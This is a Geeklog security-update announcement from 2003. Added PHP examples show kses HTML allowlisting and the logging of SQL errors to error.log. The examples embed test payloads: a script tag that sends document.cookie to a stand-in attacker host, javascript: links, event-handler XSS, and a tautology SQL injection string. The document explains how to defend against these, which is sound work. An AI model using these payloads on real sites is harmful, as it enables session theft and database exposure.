Geeklog 1.3.8-1sr1 and 1.3.7sr3 Security Updates
- Sunday, October 12 2003 @ 02:30 pm EDT
- Contributed by: Dirk
In response to the recent reports about (confirmed and unconfirmed) security issues in Geeklog, we are releasing updates to Geeklog 1.3.8-1sr1 and 1.3.7sr3, addressing most of these issues (but not all - see below for details). There's also a complete 1.3.8-1sr1 tarball that should be used for fresh installs.
The upgrades include Ulf Harnhammar's kses HTML filter, which passes user-submitted HTML through an allowlist of tags and attributes, to address possible JavaScript injections and CSS defacements.
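As an added illustration (this is not Geeklog's own code and makes no claim about the exact contents of its config.php): the pattern this update introduces is to run every piece of user-supplied HTML through kses with an allowlist of tags and attributes, keeping a tighter list for ordinary users than for admins. It assumes Ulf Harnhammar's kses.php is on the include path; the two allowlists, the protocol list, the helper name filter_html and the hostile story body are all constructed for the example.

```php
<?php
// Added example, not Geeklog's own code. Assumes kses.php (Ulf Harnhammar's
// library) is on the include path; the allowlists and input are constructed.
require_once 'kses.php';

// kses allowlist format: tag => (attribute => constraints). Anything absent
// is removed: tags not listed are dropped (their text content is kept) and
// attributes not listed are dropped, so no on* handler and no style attribute
// survives on any tag. These arrays are illustrative, not Geeklog's real ones.
$_CONF['user_html'] = array(
    'p'  => array(),
    'b'  => array(),
    'i'  => array(),
    'br' => array(),
    'a'  => array('href' => array('maxlen' => 255), 'title' => array()),
);

// Admins get a broader list, but still no script, style or event attributes.
$_CONF['admin_html'] = $_CONF['user_html'] + array(
    'img'   => array('src' => array('maxlen' => 255), 'alt' => array()),
    'table' => array(),
    'tr'    => array(),
    'td'    => array(),
);

// URL schemes kses will accept in href/src values. javascript:, vbscript:
// and data: are deliberately absent, so kses strips them from the value.
$kses_protocols = array('http', 'https', 'ftp', 'mailto');

// Choose the list from the submitter's rights on the server side, never from
// anything the client sends.
function filter_html($html, $is_admin)
{
    global $_CONF, $kses_protocols;
    $allowed = $is_admin ? $_CONF['admin_html'] : $_CONF['user_html'];
    return kses($html, $allowed, $kses_protocols);
}

// Constructed hostile story body covering the attack classes the update
// targets: script injection, an event handler, a CSS defacement via an
// inline style, a javascript: link and an img with an onerror handler.
$untrusted = '<p onmouseover="alert(1)">Hi</p>'
    . '<script>document.location="http://attacker.invalid/?"+document.cookie</script>'
    . '<b style="position:absolute;top:0;left:0;width:9999px;background:red">deface</b>'
    . '<a href="javascript:alert(document.cookie)">click</a>'
    . '<img src="http://example.invalid/x.png" onerror="alert(2)">';

echo filter_html($untrusted, false), "\n";
echo filter_html($untrusted, true), "\n";
```

Two points worth keeping in mind when adopting this: the allowlist is the whole security boundary, so adding style or any on* attribute to either array reopens exactly the holes this update closes; and kses is tag-oriented, it removes disallowed tags but leaves their text content in place and does not HTML-encode plain text, so output that lands in an attribute value or inside JavaScript still needs context-appropriate escaping.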
As for the (still unconfirmed) SQL injection reports, the upgrades include a fix to the database class so that SQL errors are no longer displayed in the browser; they are only written to Geeklog's error.log. While this does not protect against SQL injection attempts, it does at least avoid disclosing sensitive information, such as table or column names from the failing query, as part of the error message.
Furthermore, we do not at this time recommend using Geeklog with MySQL 4.1 (which, I may add, is still in alpha and thus shouldn't be used on production sites anyway). An upcoming release of Geeklog will address the remaining SQL issues, including any problems with MySQL 4.1.
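The error-handling change and its limit, as an added PHP example that is not Geeklog's database class: a query wrapper that writes driver errors to error.log and hands the caller a bare false, shown beside the bound-parameter form that actually removes the injection. It uses PDO with an in-memory SQLite database so it runs stand-alone; the class name DB, the users table and its rows, and the log file path are constructed for the example.

```php
<?php
// Added example, not Geeklog's own DB class. PDO + in-memory SQLite so it
// runs stand-alone; the table, rows and log path are constructed here.
class DB
{
    private $pdo;
    private $errorLog;

    public function __construct(PDO $pdo, $errorLog)
    {
        $this->pdo = $pdo;
        $this->errorLog = $errorLog;
        // Report failures through return values only. With warnings or
        // uncaught exceptions the driver message, and often the query itself,
        // can end up rendered in the page.
        $this->pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_SILENT);
    }

    // Write SQLSTATE, driver message and the query to error.log. The browser
    // sees nothing of the schema; the admin sees everything.
    private function logError(array $info, $sql)
    {
        $line = date('c') . " SQL error {$info[0]}: {$info[2]} in: {$sql}\n";
        file_put_contents($this->errorLog, $line, FILE_APPEND | LOCK_EX);
    }

    // Raw query, the pre-existing calling style: values are spliced into $sql
    // by the caller. Hiding the error does not change what the query does.
    public function query($sql)
    {
        $stmt = $this->pdo->query($sql);
        if ($stmt === false) {
            $this->logError($this->pdo->errorInfo(), $sql);
            return false;
        }
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }

    // Bound parameters: the value travels as data and is never parsed as SQL.
    public function queryParams($sql, array $params)
    {
        $stmt = $this->pdo->prepare($sql);
        if ($stmt === false) {
            $this->logError($this->pdo->errorInfo(), $sql);
            return false;
        }
        if ($stmt->execute($params) === false) {
            $this->logError($stmt->errorInfo(), $sql);
            return false;
        }
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Constructed fixture.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (uid INTEGER, username TEXT, passwd TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'Admin', 'hunter2'), (2, 'Dirk', 'geeklog')");
$logPath = sys_get_temp_dir() . '/error.log';
$db = new DB($pdo, $logPath);

// 1. A malformed probe (unterminated quote). Before this update the driver's
//    error text would be printed into the page; here it only reaches the log.
$probe = "x'";
$r1 = $db->query("SELECT uid FROM users WHERE username = '$probe'");

// 2. A well-formed injection: suppressing errors changes nothing about it,
//    the WHERE clause is always true and every row comes back.
$evil = "x' OR '1'='1";
$r2 = $db->query("SELECT uid, username FROM users WHERE username = '$evil'");

// 3. The same input through a bound parameter is compared as a literal string.
$r3 = $db->queryParams('SELECT uid, username FROM users WHERE username = ?', array($evil));

printf("probe: %s, spliced injection: %d rows, bound parameter: %d rows\n",
    $r1 === false ? 'false (details in error.log)' : 'rows returned',
    count($r2), count($r3));
echo file_get_contents($logPath);
```

Since error.log now carries the text of every failing query, make sure the log itself is not reachable from the web and not readable by other users on a shared host; moving the disclosure from the page to a world-readable file gains little.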
A few notes on upgrading: You only need to upload the files included in the upgrade archives to your site. Don't forget to adjust the path to config.php in the included lib-common.php so that it points to your installation. As for config.php itself, you can either use the one included in the archives and re-enter all your settings there, or you can simply copy the two new variables, $_CONF['user_html'] and $_CONF['admin_html'], into your existing config.php. In the latter case, don't forget to update the version number (near the end of config.php) as well.
You do not need to run the install script again.
Please make sure to pick the correct upgrade file for your installation. If you're running Geeklog 1.3.8-1, use the 1.3.8-1sr1 upgrade archive. If you're on Geeklog 1.3.8, you will need to upgrade to 1.3.8-1 first.
Users running on Geeklog 1.3.7sr2 should use the 1.3.7sr3 upgrade archive or use the complete 1.3.8-1sr1 tarball to upgrade to 1.3.8-1sr1 in one step.
In the unlikely event that anyone is still running on any version older than 1.3.7sr2, now would be a good time to upgrade ...
bye, Dirk